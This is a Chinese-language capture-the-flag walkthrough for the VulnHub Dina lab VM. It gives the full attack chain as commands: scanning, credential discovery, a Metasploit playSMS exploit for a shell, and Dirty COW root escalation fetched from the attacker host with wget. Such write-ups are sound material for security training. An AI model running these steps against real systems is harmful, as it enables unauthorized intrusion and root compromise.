靶机安装
下载地址:https://download.vulnhub.com/dina/Dina-1-0-1.ova
运行环境:VMware
目标:提权到root用户,并查看root用户下面的flag
信息收集
进行靶机IP发现
nmap 192.168.7.0/24
进行端口扫描
nmap 192.168.7.140 -A -p-
进行目录扫描
dirsearch -u http://192.168.7.140
IP网址访问,点击之后没有什么可利用的信息
拼接目录/robots.txt
继续拼接文件里面的目录,没有什么可用的信息,只有在nothing目录里有404 NOT FOUND
进行源码检查,发现存在可能像密码的记录,进行保存
拼接/secure ,有一个zip文件
下载这个文件,发现需要密码,用刚才发现的密码尝试,有一个正确的freedom
是一个MP3文件,正常打不开,使用记事本打开,可以找到有url和用户名
在浏览器里后面拼接这个url
是一个登录框,那肯定用户名是touhid ,密码用上面保存的那几个尝试一下,发现diana可以成功
漏洞利用
可以从页面上看到是playsms,那就使用MSF搜一下看看有没有什么漏洞
msfconsole #开启msf环境
search playsms #搜索playsms相关漏洞
使用第三个模块(编号为2):use 2
设置攻击参数:
set rhosts 192.168.7.140 #Dina IP(目标IP)
set targeturi /SecreTSMSgatwayLogin #目标URL
set lhost 192.168.7.47 #kali IP(攻击者IP)
set username touhid #目标IP的目标URL的登录用户名
set password diana #目标IP的目标URL的登录密钥、口令
show options #查看参数设置情况
开始攻击:run
#启动后执行
shell
python -c 'import pty; pty.spawn("/bin/bash")'
切换到靶机有权限的目录下:cd /tmp
#在kali上面搜索脏牛提权的脚本
提权
在kali上面进行下载脏牛的提权脚本
searchsploit 'Dirty COW' #搜索脏牛提权的脚本
searchsploit -m 文件名字 #进行下载
kali挂一个服务:
python3 -m http.server
靶机:
cd /tmp
wget http://192.168.7.47:8000/40839.c #远程下载
gcc -pthread 40839.c -o 40839 -lcrypt #进行编译
./40839 #运行
运行之后设置一个密码
可以从图片上看到一个新的账户名,密码是自己设置的,进行跳转
su firefart
获取flag值
cd /root #flag值一般都在root用户的/root目录下面
ls
cat flag.txt